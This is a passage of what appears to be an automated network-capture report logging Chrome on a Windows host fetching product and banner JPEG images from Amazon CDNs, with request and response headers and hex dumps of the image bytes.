                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 35b8601f-3bbf-461b-99e5-15f0fb65a2b5
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Thu, 15 Feb 2024 08:00:16 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Mon, 20 Jun 2044 01:33:25 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 197018
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:08 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100056-IAD, cache-ewr-kewr1740040-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a1 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 03 04 05 06 02 07 09 01 10 00 01 03 02 03 02 05 0d 0c 08 05 05 00 00 00 00 01 00 02 03 04 05 06 11 12 21 31 13 14 22 91 d2 07 08 23 32 41 51 52 74 81 93 94 b3 d1 16 24 33 35 42
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"#2AQRt$35B
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC1378INData Raw: 62 2a 8f 40 7f f6 57 4f 4b 33 9f 9e 6a c5 f4 ed 7e f2 50 77 59 c2 9d 4d 0f fa 8e a7 d0 9f fd 95 d7 98 f2 d3 86 ad c6 93 dc ed ca 5a e0 f1 27 0d c2 42 e8 78 3c b2 d1 96 6d 66 7a 96 b7 0d b6 27 ef 27 9c 7b 16 1e 66 06 3d ed 1b 83 8a 09 ab d6 bd f1 45 cf c7 e0 f5 6a 2e e2 ba 97 d3 df 2f 9a 1e f6 13 5d 57 da 38 b7 3e ca f5 28 ba d7 fe 27 b9 f8 fc 3e ad 47 7b ad aa 0b 85 fb 10 89 ea a1 a7 d1 5d 53 97 0d 9f 2b 39 5f da e4 46 e5 2a 98 88 bc ac 34 d8 6e 72 6d e1 27 9b 78 cb 4c 87 77 77 3c ca b8 aa b8 6d 77 16 9e a0 ed 19 70 8f db 96 dd fa 5d bd 6d 4c c2 f6 f6 ef b9 d1 1f bd d3 55 7d ce db 47 ce 54 5c cf fe e2 e5 8d 46 9c 4b 5d 95 35 9a 0b a7 c8 9e 59 f6 b4 e5 a1 fb 9d dc 1b 5d da ab b7 56 bc 9d 92 4b a7 2e ec 8e cf fa 1e f2 cd 9b 05 b7 6f f8 8d 1f 34 9d 35 75 1d
                                                                                                                                                                                                        Data Ascii: b*@WOK3j~PwYMZ'Bx<mfz''{f=Ej./]W8>('>G{]S+9_F*4nrm'xLww<mwp]mLU}GT\FK]5Y]VK.o45u
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC183INData Raw: 6b 0b 98 0f 25 ce 82 26 38 8e f9 68 0e 03 9c ab 63 8e 6f 67 f6 af f6 d9 d0 5b df ea a9 ff 00 4c ff 00 36 10 75 2a 7f d3 3f ee 04 c1 a3 48 4c 4a b5 6b 98 02 ae aa e9 8b b0 f4 d5 0f d6 fe 3d 4b ca d8 36 31 e0 af 43 54 72 c0 1d 46 db 6a b8 5a ef 0d ab 3e f5 7b 9c f8 5e cd af 3a 72 60 61 1f 88 95 23 56 ec 82 22 20 22 22 02 22 20 22 22 0e 0e 60 5c 74 04 44 0d 01 7d d0 11 10 34 04 d0 11 10 34 05 50 0c 91 10 16 36 e1 4b 1c e3 96 33 44 41 8d 16 c8 3c 15 c8 5b 20 f0 51 10 3f 46 c1 e0 ae 42 db 07 82 88 83 35 04 6d 8d a0 35 56 44 40 44 44 04 44 41 ff d9
                                                                                                                                                                                                        Data Ascii: k%&8hcog[L6u*?HLJk=K61CTrFjZ>{^:r`a#V" """ ""`\tD}44P6K3DA<[ Q?FB5m5VD@DDDA


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        142192.168.2.44992618.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:08 UTC378OUTGET /images/I/31uinBOk0cL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4356
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: def136bd-d67a-4f55-b216-a931884c70b4
                                                                                                                                                                                                        Date: Sun, 11 Aug 2024 20:38:35 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Wed, 23 Aug 2023 02:56:21 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-974,/images/I/31uinBOk0cL
                                                                                                                                                                                                        Expires: Sat, 06 Aug 2044 20:38:35 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-974 /images/I/31uinBOk0cL
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Via: 1.1 841da31399fe7f7e7065c840a22fae0a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 210564
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: WdpPi6N6M-_iqoAQ3-TdWdXoL5XUTZ4Lzckh3tsiEEk80qmyZvZqow==
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC4356INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 01 03 06 02 07 08 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 01 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fd 96 01 83 20 00 00 00 00 00 00 d7 17 df
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        143192.168.2.449948151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC718OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_20_BTS24_AE_GW_QC-CROSSA_DQC_CL_Nutrition_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4406
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 80426165-8328-4547-a6fc-ac34d3bd3c2d
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 12 Aug 2024 11:45:09 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 13:12:50 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 260257
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:09 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100074-IAD, cache-nyc-kteb1890083-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC1378INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 28 00 00 ff e1 03 1f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                                        Data Ascii: ExifII*Ducky(http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC1378INData Raw: 6e da a9 be d6 cb 6d 6e c9 a5 f6 15 80 00 00 00 00 06 9f 3c e9 fe 6d a8 d7 4f 3a 68 a3 6f db 24 ec 31 93 59 20 00 00 00 01 11 52 9c a1 74 78 ad d7 7e 49 d5 ea cf d2 af 68 d6 d6 64 a5 6b 5f 75 2e c5 42 c3 21 27 88 ce 3d 52 9a ae 27 31 d1 37 72 73 c0 f2 00 00 2b 91 b6 da ff 00 5b 86 22 f5 4a bc eb f3 e4 68 a0 00 07 c2 cb c4 77 cb 5b 77 7a 52 56 16 6b 43 58 30 e2 00 00 34 f4 0e 9f c6 8d a4 d7 d9 0d 46 10 00 44 99 33 c3 79 3a 49 93 9e 39 c0 62 ae 07 ff da 00 08 01 02 00 01 05 01 e3 d6 e5 dd 85 fe b0 95 cc ca c4 a4 d6 b1 1e 02 93 2c d9 a8 20 db da 4e c5 ce 27 80 96 8c 2d b3 00 a0 35 b1 af 9e 6d e0 29 e6 bd 8c da 72 56 5d cb 7e bd 40 35 5d ae 2a d9 65 02 5d f0 e4 d7 41 0c 44 cc fb 64 ed 31 ca 77 2b 4f fc 6f 1f 54 78 a3 d4 26 97 36 cc c9 ee 55 f4 ae 6e 07 f5 f8
                                                                                                                                                                                                        Data Ascii: nmn<mO:ho$1Y Rtx~Ihdk_u.B!'=R'17rs+["Jhw[wzRVkCX04FD3y:I9b, N'-5m)rV]~@5]*e]ADd1w+OoTx&6Un
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC1378INData Raw: e6 3c ea 9b 1e 9e 88 0c 70 37 98 bf 66 43 c3 99 5d d3 d5 4f 10 4a ac e5 12 41 6d c6 f0 d2 ee 30 1f 5a cb 42 fe 8a 63 3f 88 ee 8b 96 67 48 b8 a5 67 ba 78 47 93 87 70 6f 06 9e e3 00 eb 19 45 b1 fa 69 89 3d 04 ec 10 00 12 03 00 07 33 2e e6 94 51 36 63 90 10 6f 59 b8 af 6c 4e 6e 32 c3 13 01 17 53 6c b3 19 28 9e 64 e5 06 db 6a 51 5d 4d 25 49 c8 ee 89 8c 41 c8 f2 f6 d5 92 ae 20 62 0c e4 3c b2 c3 be 0a 2e 99 48 1b 6b 3f 64 71 2e 69 e5 2f ba ad 8f 78 89 ef f6 0b 0b eb d4 b5 38 7e 11 89 8d 6e 96 d5 42 cd db 65 ec 87 05 4c d5 71 c0 c5 82 ef a5 e1 d5 e9 b8 07 1e 7b 24 4f 4e 51 fb a7 d6 51 ea 6a 2a f5 4f cd e9 db 9c 5b e2 6f 6a 3e 19 fb 59 91 2e 3a 26 6d 20 3a 36 98 17 59 2e 2a 12 44 e4 0e 5d 46 01 19 1c 47 25 a6 17 26 6d f0 ae 54 07 58 ca 70 d4 db 79 cc d2 cc 47 7c
                                                                                                                                                                                                        Data Ascii: <p7fC]OJAm0ZBc?gHgxGpoEi=3.Q6coYlNn2Sl(djQ]M%IA b<.Hk?dq.i/x8~nBeLq{$ONQQj*O[oj>Y.:&m :6Y.*D]FG%&mTXpyG|
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC272INData Raw: b7 4b b7 8d d0 fc 4b b4 98 22 52 02 75 12 4f 69 2b da 43 97 93 44 e3 ac 84 d4 42 6a 31 79 3a 8b 9d 12 34 ae d8 d5 96 56 75 f0 fa 5c a3 01 2b 33 fb 62 a9 60 cc 50 8c a7 56 c3 36 a0 a9 44 a2 f8 c6 a9 45 0a 8c aa f9 70 00 80 00 40 06 80 35 f4 28 03 1d dc 83 8b 62 cb 77 a6 3f 11 36 58 5e 70 30 24 40 f6 08 3d a4 35 dc fa 04 4e 2c 71 20 4d 0c 37 b8 82 6f ce 20 02 54 81 48 4e 16 73 3a d1 59 fc 37 47 b0 f4 47 40 ea 5e b8 f6 60 ed 36 21 74 a3 53 85 3a f6 18 eb 01 fc 0c 4d a7 01 82 d1 72 be 5f 6a 78 e3 9a 49 a0 24 4d e5 d9 8b 69 99 6c 9a 48 e4 d1 aa b4 f0 9d fd 7e 70 40 d0 01 06 88 38 f6 21 b4 22 66 ef d0 64 84 99 55 a2 6d b3 f0 c8 01 88 53 7c a2 2a fc 18 cc a2 34 28 60 e8 f6 bf ef d8 8f 8c df 19 7f 27 a7 0e db 67 6e 2f 79 51 d6 79 cf 01 9d b4 bd 77 f6 34 5a fe 96
                                                                                                                                                                                                        Data Ascii: KK"RuOi+CDBj1y:4Vu\+3b`PV6DEp@5(bw?6X^p0$@=5N,q M7o THNs:Y7GG@^`6!tS:Mr_jxI$MilH~p@8!"fdUmS|*4(`'gn/yQyw4Z


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        144192.168.2.449945151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC725OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_21_BTS24_AE_GW_QC-CROSSA_DQC_CL_BeautyAppliances_186x116_EN._SY116_CB566993070_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 4238
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: f1c7b775-7134-49e9-a332-65814ec1d37e
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 12 Aug 2024 11:45:09 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 07 Aug 2044 13:12:50 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 260256
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:09 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000161-IAD, cache-ewr-kewr1740033-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC1378INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 28 00 00 ff e1 03 1f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                                        Data Ascii: ExifII*Ducky(http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC1378INData Raw: 0a dd 49 a3 f0 85 6f 75 9d 3a cc 45 21 93 f8 4e 6e d1 6d 69 cd 66 00 00 00 00 00 43 77 fb 3b 6c a2 b1 ce 8d e3 b3 18 bc 5b 4d 9d 77 2f 99 6f 99 82 94 80 00 00 04 ae bb 1e 5f 75 4b 72 d3 5b 0c 5e 51 e6 f2 d0 af 34 f7 c9 76 22 12 1d 86 cf 51 5a 28 ce 93 14 36 3b d0 3b a3 1e 4f 00 10 00 05 2b 8f 35 be ac 1e 9e b7 0a 57 05 da 32 a0 e5 a4 00 00 e6 51 f9 24 7b a6 8e d7 43 99 90 00 01 61 b1 ea 1d 4c 52 c2 b4 d8 39 b0 00 01 ce b4 07 4b 1d 90 73 52 00 1f ff da 00 08 01 02 00 01 05 01 cf 8d a7 55 1b fe a8 cb 6a aa d8 92 9b 6d 88 ed 80 29 93 cc 13 62 11 d5 45 58 3e a1 c5 5e 5d bd 55 30 ff 00 f9 91 c0 30 75 ce 47 9a 56 f2 55 d3 21 07 de 14 e7 70 4d c9 2e 1a 6c a7 1f 88 de 0e 28 20 b6 48 25 d7 0d 1d 79 08 71 f1 5a d3 60 7d 58 77 db d8 4f 67 60 3d 4b 87 7d bd 84 f6 7c
                                                                                                                                                                                                        Data Ascii: Iou:E!NnmifCw;l[Mw/o_uKr[^Q4v"QZ(6;;O+5W2Q${CaLR9KsRUjm)bEX>^]U00uGVU!pM.l( H%yqZ`}XwOg`=K}|
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC1378INData Raw: 31 66 d0 1c ce 09 ea 03 88 f4 16 d4 5a 74 0a ca a2 4d 39 e1 dd 09 62 e1 05 d6 73 2b 96 26 70 2f d9 75 a8 2d 25 1f ab 68 31 88 b6 bf d4 5a 7e 42 0e 3e a5 e7 e7 b9 97 70 1b a1 2e 5a 75 0d 6d 4a d0 d9 1c 67 9c 72 db 03 e6 af f9 41 76 3e a5 f6 12 2f b0 0d cb d0 8b b9 a5 14 4d 98 e4 04 1b d6 6e 07 b6 27 37 19 61 89 80 8b a9 b6 59 8c 94 4f 32 72 83 6d b5 36 d5 d4 d2 54 9c 8e e8 98 c4 1c 8f 40 cb ec 0b 0b cf a9 6a 70 f9 46 26 35 ba 5b 55 0b 37 6d 97 b2 1c 15 33 55 c7 03 16 0b be 97 d3 ab 96 e0 1e bc f6 48 9e bc a3 f5 4f ce 51 cc d4 55 cd 3e 2e 5d b9 c5 bf 53 7b 51 f4 cf db 54 eb 5d 92 94 cf d2 b9 98 a9 e7 68 6d ae 55 0e d5 ce 26 31 07 23 ee 85 06 53 98 6c b0 fe ac 76 c0 ab 31 1c 19 8d 9b fb 67 18 99 9d fe c4 bd 72 d8 6b b6 bf c6 e7 31 d9 02 fd cb 6a d7 54 52 1c
                                                                                                                                                                                                        Data Ascii: 1fZtM9bs+&p/u-%h1Z~B>p.ZumJgrAv>/Mn'7aYO2rm6T@jpF&5[U7m3UHOQU>.]S{QT]hmU&1#Slv1grk1jTR
                                                                                                                                                                                                        2024-08-15 13:38:09 UTC104INData Raw: bc 99 83 12 11 d1 cf f3 2a 15 bd cc 1f eb 0d b3 e4 a8 4f 45 fe b2 f5 e3 54 0c 10 2a b6 c3 2c ea a5 3d 5c 28 89 20 e6 11 31 34 65 f4 c6 89 73 06 14 f4 6f c9 72 13 51 76 ff 00 6b 27 e6 cd 76 07 95 bf 02 31 2f c3 64 61 a3 7c cf fa 19 a3 53 17 bd 7b e7 43 5c f6 f2 7d 0d d9 6a cf a7 5c e2 d3 a7 ab 73 f1 4f 1f ff d9
                                                                                                                                                                                                        Data Ascii: *OET*,=\( 14esorQvk'v1/da|S{C\}j\sO


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        145192.168.2.44993418.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:10 UTC509OUTGET /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-3lpvr-noc3q_372x232_ae-en._SY116_CB608574218_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:10 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 3664
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: e6553462-9cc8-45cc-919b-78d42641c6d1
                                                                                                                                                                                                        Date: Sun, 04 Aug 2024 02:49:38 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Wed, 28 Sep 2022 13:34:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-865,/images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-3lpvr-noc3q_37
                                                                                                                                                                                                        Expires: Sat, 30 Jul 2044 02:49:38 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-865 /images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-3lpvr-noc3q_37
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 7d758b616f5473c7b4bee1c49ecfa98a.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 989312
                                                                                                                                                                                                        Server-Timing: cdn-cache-hit,cdn-pop;desc="AMS58-P5",cdn-rid;desc="IyegCsteEDPaqCbn7q4EzmogSkD78w1XuqKmm_DSWBcrse7PFeKnMQ==",cdn-hit-layer;desc="Origin Shield",cdn-downstream-fbl;dur=102,provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: IyegCsteEDPaqCbn7q4EzmogSkD78w1XuqKmm_DSWBcrse7PFeKnMQ==
